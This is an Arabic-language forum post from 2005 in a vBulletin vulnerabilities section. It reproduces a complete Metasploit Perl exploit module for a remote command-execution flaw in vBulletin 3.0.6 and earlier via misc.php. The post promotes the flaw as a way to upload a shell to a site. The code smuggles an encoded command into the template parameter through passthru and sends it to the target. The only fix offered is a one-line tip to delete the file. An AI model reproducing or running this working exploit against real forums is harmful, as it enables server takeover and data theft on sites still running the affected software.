الرئيسية     | الشروط والقوانين  | سياسة الخصوصية | اتصل بنا | الأرشيف |  RSS
  

 

يمنع منعا باتا وضع موضوع إعلاني

 


العودة   منتدى الشبكة الكويتية > قســـــ تطوير المواقع ـــــــــم > تطويــــر المنتديــ VB3 ـات > قسم ثغرات النسخه الثالثه

قسم ثغرات النسخه الثالثه هذا القسم لايقبل اي مشاركه .. فقط يتم وضع موضوع الثغره ومكتشفها وطريقة ترقيعها

 
أدوات الموضوع
  #1  
قديم 07-10-2005, 04:08 PM
الصورة الرمزية VIP
VIP VIP غير متصل

AdminiStrator

 





VIP كاتب مميزVIP كاتب مميزVIP كاتب مميزVIP كاتب مميز
[ثغره] بملف الـ misc.php

السلام عليكم يا أعضاء ترايدنت

ثغره تمكنك من رفع شل على الموقع

وللترقيع

مكتشف الثغره
str0ke

تاريخ: 2005-08-03


الكود

كود:
##
#        Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
#    Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
#         Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
#  - This is an exploit module for the Metasploit Framework, please see
#     https://metasploit.com/projects/Framework for more information.
##

package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
        'Name'     => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
        'Version'  => '$Revision: 1.0 $',
        'Authors'  => [ 'str0ke' ],
        'Arch'     => [ ],
        'OS'       => [ ],
        'Priv'     => 0,
        'UserOpts' =>
          {
                'RHOST' => [1, 'ADDR', 'The target address'],
                'RPORT' => [1, 'PORT', 'The target port', 80],
                'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
                'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],
                'SSL'   => [0, 'BOOL', 'Use SSL'],
          },

        'Description' => Pex::Text::Freeform(qq{
                This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),

        'Refs' =>
          [
                ['MIL', '832'],
          ],

        'Payload' =>
          {
                'Space' => 512,
                'Keys'  => ['cmd', 'cmd_bash'],
          },

        'Keys' => ['vBulletin'],
  };

sub new {
        my $class = shift;
        my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
        return($self);
}

sub Exploit {
        my $self = shift;
        my $target_host    = $self->GetVar('RHOST');
        my $target_port    = $self->GetVar('RPORT');
        my $vhost          = $self->GetVar('VHOST') || $target_host;
        my $path           = $self->GetVar('RPATH');
        my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;

        # Encode the command as a set of chr() function calls
        my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

        # Create the get request data
        my $data = "?do=page&template={\${passthru($byte)}}";

        my $req =
                "GET $path$data HTTP/1.1\r\n".
                "Host: $vhost:$target_port\r\n".
                "Content-Type: application/html\r\n".
                "Content-Length: ". length($data)."\r\n".
                "Connection: Close\r\n".
                "\r\n";

        my $s = Msf::Socket::Tcp->new(
                'PeerAddr'  => $target_host,
                'PeerPort'  => $target_port,
                'LocalPort' => $self->GetVar('CPORT'),
                'SSL'       => $self->GetVar('SSL'),
          );

        if ($s->IsError){
                $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
                return;
        }

        $self->PrintLine("[*] Sending the malicious vBulletin Get request...");

        $s->Send($req);

        my $results = $s->Recv(-1, 20);
        $s->Close();

        return;
}

1;
وللتوضيح اكثر
الثغره في ملف

misc.php

وانصح بحذف الملف

 

 

توقيع : VIP

[ثغره] بملف الـ misc.php

مواضيع ذات صله قسم ثغرات النسخه الثالثه

[ثغره] بملف الـ misc.php



الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغره بمكتبة الصور بملف sessions.php وطريقة تسكير الثغره kwety تطوير المواقع 0 31-03-2006 02:37 AM
[ثغره] بملف vBulletin 3.0.X init.php SQL Injection VIP قسم ثغرات النسخه الثالثه 0 07-10-2005 04:27 PM
[ثغره] بملف config.php تختص بالكوكيز VIP قسم ثغرات النسخه الثالثه 0 07-10-2005 04:23 PM
[ثغره] بملف includes/functions_faq.php VIP قسم ثغرات النسخه الثالثه 0 07-10-2005 04:21 PM
[ثغره] بملف الرسائل الخاصه private.php VIP قسم ثغرات النسخه الثالثه 0 07-10-2005 04:02 PM

الساعة الآن 04:25 PM
جميع الحقوق محفوظة لـ الشبكة الكويتية

التعليقات المنشورة لا تعبر عن رأي الشبكة الكويتية ولا نتحمل أي مسؤولية قانونية حيال ذلك ويتحمل كاتبها مسؤولية النشر

RSS RSS 2.0 XML MAP HTML